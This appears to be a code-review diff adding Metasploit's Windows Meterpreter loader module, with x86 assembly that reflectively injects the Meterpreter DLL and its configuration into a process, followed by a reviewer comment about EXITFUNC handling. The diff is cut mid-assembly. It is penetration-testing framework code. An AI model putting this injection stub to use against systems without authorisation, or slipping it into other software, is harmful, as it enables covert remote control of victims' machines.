lib/msf/core/payload/windows/meterpreter_loader.rb

```diff
@@ -0,0 +1,99 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/reflective_dll_loader'
+
+module Msf
+
+###
+#
+# Common module stub for ARCH_X86 payloads that make use of Meterpreter.
+#
+###
+
+module Payload::Windows::MeterpreterLoader
+
+  include Msf::ReflectiveDLLLoader
+  include Msf::Payload::Windows
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Meterpreter & Configuration RDI',
+      'Description'   => 'Inject Meterpreter & the configuration stub via RDI',
+      'Author'        => [ 'sf', 'OJ Reeves' ],
+      'References'    => [
+        [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
+        [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
+      ],
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86,
+      'PayloadCompat' => { 'Convention' => 'sockedi -https', },
+      'Stage'         => { 'Payload'   => "" }
+      ))
+  end
+
+  def asm_invoke_metsrv(opts={})
+    asm = %Q^
+        ; prologue
+          dec ebp               ; 'M'
+          pop edx               ; 'Z'
+          call $+5              ; call next instruction
+          pop ebx               ; get the current location (+7 bytes)
+          push edx              ; restore edx
+          inc ebp               ; restore ebp
+          push ebp              ; save ebp for later
+          mov ebp, esp          ; set up a new stack frame
+        ; Invoke ReflectiveLoader()
+          ; add the offset to ReflectiveLoader() (0x????????)
+          add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}
+          call ebx              ; invoke ReflectiveLoader()
+        ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
+          ; offset from ReflectiveLoader() to the end of the DLL
+          add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
```

Comment:
`EXITFUNC` is now built into meterpreter and doesn't need to be in the initial stage/setup. Hence the `MeterpreterLoader` module doesn't need to worry about it. Saves a few bytes here too!